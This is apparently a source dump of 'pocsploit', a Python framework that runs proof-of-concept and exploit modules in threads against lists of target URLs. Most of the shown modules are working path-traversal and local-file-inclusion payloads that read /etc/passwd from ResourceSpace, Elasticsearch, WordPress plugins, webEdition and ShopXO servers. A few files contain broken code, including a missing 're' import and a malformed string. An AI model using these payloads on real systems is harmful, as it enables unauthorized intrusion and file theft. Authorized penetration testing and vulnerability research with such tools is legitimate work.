├── result └── result.log ├── lib ├── utils │ ├── __init__.py │ └── useragent.py ├── vars │ ├── vars.py │ └── info.py ├── controller │ ├── output.py │ └── engine.py ├── core │ ├── common.py │ ├── enums.py │ └── exception.py └── cli.py ├── .gitignore ├── img ├── demo.png └── logo.png ├── requirements.txt ├── conf └── config.py ├── pocsploit.py ├── plugins └── oob.py ├── LICENSE └── modules ├── vulnerabilities ├── other │ ├── dynamicweb-panel.py │ ├── keycloak-xss.py │ ├── openvpn-hhi.py │ ├── oa-tongda-path-traversal.py │ ├── processmaker-lfi.py │ ├── netis-info-leak.py │ ├── gsoap-lfi.py │ ├── mida-eframework-xss.py │ ├── huawei-router-auth-bypass.py │ ├── jfrog-unauth-build-exposed.py │ ├── sponip-network-system-ping-rce.py │ ├── thruk-xss.py │ ├── visual-tools-dvr-rce.py │ ├── vanguard-post-xss.py │ ├── sonicwall-sslvpn-shellshock.py │ ├── yishaadmin-lfi.py │ ├── hashicorp-consul-rce.py │ ├── zimbra-preauth-ssrf.py │ └── dixell-xweb500-filewrite.py ├── apache │ └── apache-ofbiz-log4j-rce.py ├── vmware │ └── vmware-vcenter-lfi.py ├── jamf │ └── jamf-log4j-jndi-rce.py ├── jolokia │ └── jolokia-heap-info-disclosure.py ├── thinkcmf │ └── thinkcmf-rce.py ├── wordpress │ └── wp-multiple-theme-ssrf.py ├── fastjson │ └── fastjson-1-2-62-rce.py └── ruijie │ └── ruijie-nbr1300g-exposure.py ├── cves ├── 2013 │ ├── CVE-2013-2248.py │ ├── CVE-2013-3526.py │ ├── CVE-2013-2287.py │ ├── CVE-2013-5528.py │ ├── CVE-2013-5979.py │ └── CVE-2013-4117.py ├── 2014 │ ├── CVE-2014-5258.py │ ├── CVE-2014-4940.py │ ├── CVE-2014-2962.py │ ├── CVE-2014-10037.py │ ├── CVE-2014-2321.py │ ├── CVE-2014-6308.py │ ├── CVE-2014-3744.py │ ├── CVE-2014-5111.py │ ├── CVE-2014-9094.py │ ├── CVE-2014-9444.py │ ├── CVE-2014-4561.py │ ├── CVE-2014-2323.py │ ├── CVE-2014-8799.py │ ├── CVE-2014-9607.py │ ├── CVE-2014-9609.py │ ├── CVE-2014-9617.py │ ├── CVE-2014-4544.py │ ├── CVE-2014-9608.py │ ├── CVE-2014-5368.py │ └── CVE-2014-2908.py ├── 2015 │ ├── CVE-2015-3648.py │ ├── CVE-2015-3337.py │ ├── CVE-2015-4694.py │ ├── CVE-2015-9480.py │ ├── CVE-2015-1000012.py │ ├── CVE-2015-7297.py │ ├── CVE-2015-7780.py │ ├── CVE-2015-5688.py │ ├── CVE-2015-7823.py │ ├── CVE-2015-2166.py │ ├── CVE-2015-6920.py │ ├── CVE-2015-8349.py │ ├── CVE-2015-2067.py │ ├── CVE-2015-1880.py │ ├── CVE-2015-4414.py │ ├── CVE-2015-6544.py │ ├── CVE-2015-8399.py │ ├── CVE-2015-4050.py │ ├── CVE-2015-5471.py │ ├── CVE-2015-0554.py │ ├── CVE-2015-5461.py │ ├── CVE-2015-9414.py │ ├── CVE-2015-2068.py │ ├── CVE-2015-4632.py │ └── CVE-2015-2807.py ├── 2017 │ ├── CVE-2017-17562.py │ └── CVE-2017-15287.py ├── 2018 │ ├── CVE-2018-18778.py │ ├── CVE-2018-7719.py │ ├── CVE-2018-7467.py │ ├── CVE-2018-8715.py │ └── CVE-2018-8033.py ├── 2019 │ ├── CVE-2019-16278.py │ ├── CVE-2019-17538.py │ └── CVE-2019-6715.py ├── 2020 │ ├── CVE-2020-7796.py │ ├── CVE-2020-28208.py │ └── CVE-2020-5777.py ├── 2021 │ └── CVE-2021-3297.py └── 2022 │ ├── CVE-2022-25323.py │ ├── CVE-2022-0281.py │ ├── CVE-2022-0378.py │ ├── CVE-2022-0432.py │ ├── CVE-2022-0692.py │ └── CVE-2022-0218.py └── cnvd └── 2021 └── CNVD-2021-15822.py /result/result.log: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /lib/utils/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | data/ 3 | script/ 4 | conf/config-bak.py 5 | -------------------------------------------------------------------------------- /img/demo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cckuailong/pocsploit/HEAD/img/demo.png -------------------------------------------------------------------------------- /img/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cckuailong/pocsploit/HEAD/img/logo.png -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | loguru==0.5.3 2 | IPy==1.1 3 | requests==2.24.0 4 | urllib3==1.25.11 -------------------------------------------------------------------------------- /conf/config.py: -------------------------------------------------------------------------------- 1 | # oob 2 | 3 | DNSLOG_URI = "" 4 | DNSLOG_TOKEN = "" 5 | DNSLOG_IDENTIFY = "" -------------------------------------------------------------------------------- /lib/vars/vars.py: -------------------------------------------------------------------------------- 1 | from lib.core.datatype import AttribDict 2 | 3 | 4 | paths = AttribDict() 5 | 6 | cmdLineOptions = AttribDict() 7 | 8 | conf = AttribDict() 9 | 10 | th = AttribDict() 11 | -------------------------------------------------------------------------------- /lib/controller/output.py: -------------------------------------------------------------------------------- 1 | SEVERITY_OUTPUT = { 2 | "critical": "\033[01;31;31m[critical]\033[0m", 3 | "high": "\033[01;35;35m[high]\033[0m", 4 | "medium": "\033[01;33;33m[medium]\033[0m", 5 | "low": "\033[01;34;34m[low]\033[0m", 6 | "info": "\033[01;37;37m[info]\033[0m", 7 | } -------------------------------------------------------------------------------- /pocsploit.py: -------------------------------------------------------------------------------- 1 | import urllib3 2 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 3 | import os 4 | import sys 5 | sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))) 6 | from lib.cli import main 7 | 8 | 9 | if __name__ == "__main__": 10 | main() -------------------------------------------------------------------------------- /lib/core/common.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from loguru import logger 3 | from lib.core.enums import EXIT_STATUS 4 | from lib.core.exception import ToolkitValueException 5 | 6 | def systemQuit(status=EXIT_STATUS.SYSETM_EXIT): 7 | if status == EXIT_STATUS.SYSETM_EXIT: 8 | logger.info('System Normal exit.') 9 | elif status == EXIT_STATUS.USER_QUIT: 10 | logger.error('User exit!') 11 | elif status == EXIT_STATUS.ERROR_EXIT: 12 | logger.error('System Error exit.') 13 | else: 14 | raise ToolkitValueException('Invalid status code: %s' % str(status)) 15 | sys.exit(0) -------------------------------------------------------------------------------- /lib/core/enums.py: -------------------------------------------------------------------------------- 1 | class CONTENT_STATUS: 2 | IN_PROGRESS = 0 3 | COMPLETE = 1 4 | 5 | 6 | class EXIT_STATUS: 7 | SYSETM_EXIT = 0 8 | ERROR_EXIT = 1 9 | USER_QUIT = 2 10 | 11 | 12 | class POC_RESULT_STATUS: 13 | FAIL = 0 14 | SUCCESS = 1 15 | RETRAY = 2 16 | 17 | 18 | class TARGET_MODE_STATUS: 19 | FILE = 9 20 | SINGLE = 8 21 | IPMASK = 7 22 | RANGE = 6 23 | API = 5 24 | 25 | 26 | class PROXY_TYPE: # keep same with SocksiPy(import socks) 27 | PROXY_TYPE_SOCKS4 = SOCKS4 = 1 28 | PROXY_TYPE_SOCKS5 = SOCKS5 = 2 29 | PROXY_TYPE_HTTP = HTTP = 3 30 | PROXY_TYPE_HTTP_NO_TUNNEL = 4 31 | -------------------------------------------------------------------------------- /lib/core/exception.py: -------------------------------------------------------------------------------- 1 | class ToolkitBaseException(Exception): 2 | pass 3 | 4 | 5 | class ToolkitConnectionException(Exception): 6 | pass 7 | 8 | 9 | class ToolkitDataException(ToolkitBaseException): 10 | pass 11 | 12 | 13 | class ToolkitMissingPrivileges(ToolkitBaseException): 14 | pass 15 | 16 | 17 | class ToolkitUserQuitException(ToolkitBaseException): 18 | pass 19 | 20 | 21 | class ToolkitSystemException(ToolkitBaseException): 22 | pass 23 | 24 | 25 | class ToolkitValueException(ToolkitBaseException): 26 | pass 27 | 28 | 29 | class ToolkitPluginException(ToolkitBaseException): 30 | pass 31 | 32 | 33 | class RegisterException(Exception): 34 | pass 35 | 36 | 37 | class RegisterValueException(RegisterException): 38 | pass 39 | 40 | 41 | class RegisterDataException(RegisterException): 42 | pass 43 | 44 | 45 | class RegisterMutexException(RegisterException): 46 | pass 47 | -------------------------------------------------------------------------------- /lib/vars/info.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | VERSION = '0.0.1' 4 | PROJECT = "pocsploit" 5 | AUTHOR = 'cckuailong' 6 | PLATFORM = os.name 7 | LICENSE = 'MIT' 8 | 9 | # essential methods/functions in custom modules (such as function poc()) 10 | ESSENTIAL_MODULE_METHODS = ['info', 'fingerprint', 'poc', 'exp'] 11 | 12 | GIT_REPOSITORY = "https://github.com/cckuailong/pocsploit" 13 | 14 | BANNER = ''' 15 | \033[01;31;31m__ _ __ \033[0m 16 | \033[01;33;33m____ ____ _____\033[0m\033[01;31;31m_________ / /___ (_) /_\033[0m 17 | \033[01;33;33m/ __ \/ __ \/ ___\033[0m\033[01;31;31m/ ___/ __ \/ / __ \/ / __/\033[0m 18 | \033[01;33;33m/ /_/ / /_/ / /__\033[0m\033[01;31;31m(__ ) /_/ / / /_/ / / /_ \033[0m 19 | \033[01;33;33m/ .___/\____/\___/\033[0m\033[01;31;31m____/ .___/_/\____/_/\__/ \033[0m 20 | \033[01;33;33m/_/ \033[0m\033[01;31;31m/_/ \033[0m 21 | \033[01;37m{\033[01;m Version %s by %s \033[01;37m}\033[0m 22 | \n''' % (VERSION, AUTHOR) -------------------------------------------------------------------------------- /plugins/oob.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import time 3 | import random 4 | import string 5 | from conf.config import * 6 | 7 | 8 | def gen_oob_domain(): 9 | flag = "".join(random.choice(string.ascii_letters) for _ in range(0, 10)).lower() 10 | return "{}.{}".format(flag, DNSLOG_IDENTIFY), flag 11 | 12 | def gen_oob_url(): 13 | flag = "".join(random.choice(string.ascii_letters) for _ in range(0, 10)).lower() 14 | return "http://{}.{}/".format(flag, DNSLOG_IDENTIFY), flag 15 | 16 | 17 | def verify_request(type, flag): 18 | retVal = False 19 | counts = 3 20 | url = "{uri}/v1/records?token={token}&type={type}&filter={flag}".format(uri=DNSLOG_URI, token=DNSLOG_TOKEN, type=type, flag=flag) 21 | while counts: 22 | try: 23 | time.sleep(3) 24 | resp = requests.get(url, timeout=5) 25 | # print(resp.text) 26 | if resp and resp.status_code == 200 and flag in str(resp.content): 27 | retVal = True 28 | break 29 | except: 30 | time.sleep(1) 31 | 32 | counts -= 1 33 | return retVal -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 cckuailong 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /lib/utils/useragent.py: -------------------------------------------------------------------------------- 1 | import random 2 | from loguru import logger 3 | from lib.vars.vars import conf, th, paths 4 | from lib.vars.ua import UA_LIST 5 | 6 | 7 | def get_random_agent(): 8 | return random.sample(UA_LIST, 1)[0] 9 | 10 | 11 | def firefox(): 12 | return 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0' 13 | 14 | 15 | def ie(): 16 | return 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)' 17 | 18 | 19 | def chrome(): 20 | return 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30' 21 | 22 | 23 | def opera(): 24 | return 'Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.9.168 Version/11.50' 25 | 26 | 27 | def iphone(): 28 | return 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16' 29 | 30 | 31 | def google_bot(): 32 | return 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' 33 | 34 | 35 | def msn_bot(): 36 | return 'msnbot/1.1 (+http://search.msn.com/msnbot.htm)' 37 | 38 | 39 | def yahoo_bot(): 40 | return 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)' 41 | -------------------------------------------------------------------------------- /lib/cli.py: -------------------------------------------------------------------------------- 1 | import os 2 | import traceback 3 | from loguru import logger 4 | from lib.vars.vars import * 5 | from lib.vars.info import BANNER 6 | from lib.core.parse import cmdLineParser 7 | from lib.core.option import initOptions 8 | from lib.controller.loader import loadModule, loadTargets 9 | from lib.controller.engine import run 10 | from lib.core.common import systemQuit 11 | from lib.core.enums import EXIT_STATUS 12 | from lib.core.exception import ToolkitUserQuitException 13 | from lib.core.exception import ToolkitMissingPrivileges 14 | from lib.core.exception import ToolkitSystemException 15 | 16 | def main(): 17 | try: 18 | print(BANNER) 19 | 20 | cmdLineOptions.update(cmdLineParser().__dict__) 21 | initOptions(cmdLineOptions) 22 | 23 | loadModule() 24 | loadTargets() 25 | 26 | run() 27 | 28 | systemQuit(EXIT_STATUS.SYSETM_EXIT) 29 | 30 | except ToolkitMissingPrivileges as e: 31 | logger.error(e) 32 | systemQuit(EXIT_STATUS.ERROR_EXIT) 33 | 34 | except ToolkitSystemException as e: 35 | logger.error(e) 36 | systemQuit(EXIT_STATUS.ERROR_EXIT) 37 | 38 | except ToolkitUserQuitException: 39 | systemQuit(EXIT_STATUS.USER_QUIT) 40 | except KeyboardInterrupt: 41 | systemQuit(EXIT_STATUS.USER_QUIT) 42 | 43 | except Exception: 44 | logger.warning(traceback.format_exc()) 45 | logger.warning('It seems like you reached a unhandled exception, please raise a issue via:.') 46 | -------------------------------------------------------------------------------- /modules/vulnerabilities/other/dynamicweb-panel.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Dynamicweb Login Panel''', 9 | "description": '''''', 10 | "severity": "info", 11 | "references": [ 12 | "https://www.dynamicweb.com" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | "shodan-query":'''http.component:"Dynamicweb"''' 23 | }, 24 | "tags": ["panel", "dynamicweb"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/Admin/Access/default.aspx""" 39 | method = "GET" 40 | data = """""" 41 | headers = {'Accept-Encoding': 'gzip, deflate'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if ("""Dynamicweb""" in resp0.text) and (resp0.status_code == 200): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-3648.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''ResourceSpace - Local File inclusion''', 9 | "description": '''ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://vulners.com/cve/CVE-2015-3648/", 13 | "https://www.securityfocus.com/bid/75019" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "lfi", "resourcespace"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /lib/controller/engine.py: -------------------------------------------------------------------------------- 1 | from concurrent.futures import ThreadPoolExecutor, wait, as_completed, ALL_COMPLETED 2 | from loguru import logger 3 | from lib.vars.vars import th 4 | from lib.controller.output import SEVERITY_OUTPUT 5 | 6 | 7 | def scan(target, module_obj): 8 | result = {} 9 | if th.FP_MODE: 10 | if module_obj.fingerprint(target): 11 | logger.debug(f"[FP] {target} target the fingerprint, do poc/exp next") 12 | if th.DETECT_MODE == "poc": 13 | result = module_obj.poc(target) 14 | elif th.DETECT_MODE == "exp": 15 | result = module_obj.exp(target) 16 | else: 17 | logger.warning(f"[FP] {target} not the fingerprint") 18 | else: 19 | if th.DETECT_MODE == "poc": 20 | result = module_obj.poc(target) 21 | elif th.DETECT_MODE == "exp": 22 | result = module_obj.exp(target) 23 | if result: 24 | logger.success("[{}]{}[{}] {}".format(module_obj.__name__, SEVERITY_OUTPUT[result["info"]["severity"]], "\033[1m"+result["info"]["name"]+"\033[0m", result["payload"])) 25 | 26 | def run(): 27 | with ThreadPoolExecutor(max_workers=th.THREADS_NUM) as executor: 28 | all_tasks = [] 29 | while True: 30 | if th.queue.qsize() > 0: 31 | target = th.queue.get(timeout=1) 32 | for module_obj in th.module_objs: 33 | all_tasks.append(executor.submit(scan, target, module_obj)) 34 | else: 35 | break 36 | 37 | wait(all_tasks, return_when=ALL_COMPLETED) 38 | 39 | # while True: 40 | # if th.queue.qsize() > 0: 41 | # target = th.queue.get(timeout=1) 42 | # for module_obj in th.module_objs: 43 | # print(target, module_obj) 44 | # scan(target, module_obj) 45 | # else: 46 | # break 47 | -------------------------------------------------------------------------------- /modules/cnvd/2021/CNVD-2021-15822.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''ShopXO Download File Read''', 9 | "description": '''''', 10 | "severity": "high", 11 | "references": [ 12 | "https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["shopxo", "lfi", "cnvd", "cnvd2021"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= """ 39 | method = "GET" 40 | data = """""" 41 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-3337.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Elasticsearch Head plugin LFI''', 9 | "description": '''Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/37054/" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2015", "elastic", "lfi", "elasticsearch", "plugin"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "root:" in resp.text: 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-4694.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Zip Attachments <= 1.1.4 - Arbitrary File Download''', 9 | "description": '''The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://wpscan.com/vulnerability/8047" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", 16 | "cvss-score": "8.6", 17 | "cve-id": "CVE-2015-4694", 18 | "cwe-id": "CWE-22" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["lfi", "wordpress", "cve", "cve2015", "wp-plugin"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "root:" in resp.text: 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/keycloak-xss.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Keycloak <= 8.0 - Cross Site Scripting''', 9 | "description": '''''', 10 | "severity": "info", 11 | "references": [ 12 | "https://cure53.de/pentest-report_keycloak.pdf" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["keycloak", "xss"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/auth/realms/master/clients-registrations/openid-connect""" 39 | method = "POST" 40 | data = {"":1} 41 | headers = {'Content-Type': 'application/json'} 42 | resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 400) and ("""Unrecognized field """" in resp0.text): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-5258.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''webEdition 6.3.8.0 - Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-5258", 13 | "https://www.exploit-db.com/exploits/34761" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2014-5258", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/webEdition/showTempFile.php?file=../../../../etc/passwd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-9480.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Plugin RobotCPA 5 - Directory Traversal''', 9 | "description": '''The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480", 13 | "https://www.exploit-db.com/exploits/37252" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "7.5", 18 | "cve-id": "CVE-2015-9480", 19 | "cwe-id": "CWE-22" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in 